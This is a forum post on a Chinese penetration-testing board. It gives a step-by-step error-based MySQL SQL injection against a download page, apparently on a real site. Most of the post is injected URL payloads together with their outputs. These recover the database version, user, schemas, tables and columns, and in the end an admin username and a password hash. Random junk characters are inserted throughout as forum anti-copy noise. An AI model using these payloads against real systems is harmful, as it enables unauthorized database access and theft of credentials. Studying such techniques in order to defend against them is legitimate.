找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 php+mysql高级爆错注入经测算有效
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1940|回复: 0
打印 上一主题 下一主题

php+mysql高级爆错注入经测算有效

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-13 17:52:09 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
http://www.wooyun.org/bugs/wooyun-2010-01666% n( R5 W$ k/ ]/ l9 N$ w

6 E: |3 u& z( I1 q' F之前想找个测试 没想到这有 可以测试下做个记录而已 / J9 S2 c, U" e% u: z& k

6 Q  y+ V! Y7 l  e, v$ c% u  i& I* N9 ?6 ohttp://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003& V8 y0 n3 i% I$ g7 f6 v5 U
$ G$ J+ A" D+ E" Y' M
/data0/htdocs/leqi_new/app/myapp.php3 S/ q5 G2 e9 h& s1 k8 M7 K9 I

" w% C& c+ t: [ 或者0 b' ?1 S. a2 G  A8 t
2 c! o) |. J% K* {# e8 n
/**********version()**********/ 5.1.49-log
, Z/ A. {7 h) J7 z2 e4 nhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003, ~- A' M$ D* M/ i' I& r5 c

0 P5 N4 [% ~9 c4 D/**********user()**********/  
: _. h7 E* R- x( l6 _6 ?. Khttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003; }$ ]* p% M" _1 Y& X1 j1 s

2 D8 P8 j' R4 _/**********database()**********/  leqi: k6 n9 l: h% G6 P! s
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0035 G0 f& V1 w; G8 I, S
, |( e4 l9 F0 J4 x
/**********limit依次递归爆库**********/
  J( K" U& M3 [$ [1 L0 q9 [) P; `/ Whttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003% t% X2 ?' u; n: m
information_schema
' I6 D/ F" ?( t* f6 h6 t( thttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003- ~3 W' a* _* y4 @7 ?% ]+ M
leqi
9 V9 u9 L9 d+ F- shttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0031 L" Y7 ^' P7 Y: t  L
test
. s5 `6 K! r+ @+ L2 v# O/ Z) L  Q4 R5 B: t4 j
/**********limit依次递归爆表名**********/
5 C( @! E' L) bhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
8 l6 O3 D7 v" K* i' S4 J, Ousers9 }( r! h  T( H
/ K/ {4 j  R) L3 T
/**********limit依次递归爆字段名**********// P" c2 {# u" v' O. N7 V# o) ^5 b
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
' }/ {- O% X$ o# v% E" Auser_id,username,nickname,passwd,group_id
" L; \2 F; r  h0 `% q  chttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
5 _5 {6 Y: U% U' e$ d; s: U% Z5 w/wapc/5000_0005_003' V0 X- E1 z! v- q7 m3 ~
11 21
& J& p  e3 n$ R0 Ehttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23" K+ Z; J  d6 B& S. S. T  l
/wapc/5000_0005_003: ?8 y% d+ v+ M" c) z
11 341 351 361$ Z/ J7 q+ d; ~) s5 n# X! c6 e0 E# g; N
/**********爆数据**********/' i9 E5 \/ E% ?, k
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23) F; e$ ?4 [2 A
admin
# u7 D' A0 ~9 _$ L- C. L7 }- |http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%237 U6 a. e& W" x9 J: U
6a8b4574ca231eb8bd52764d4978ffcd1 U* J1 _6 H  i; |' c) g

, v% d( n9 Q( n3 r# B / {5 ]: r" L( ]& j$ \  ^0 H6 p
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表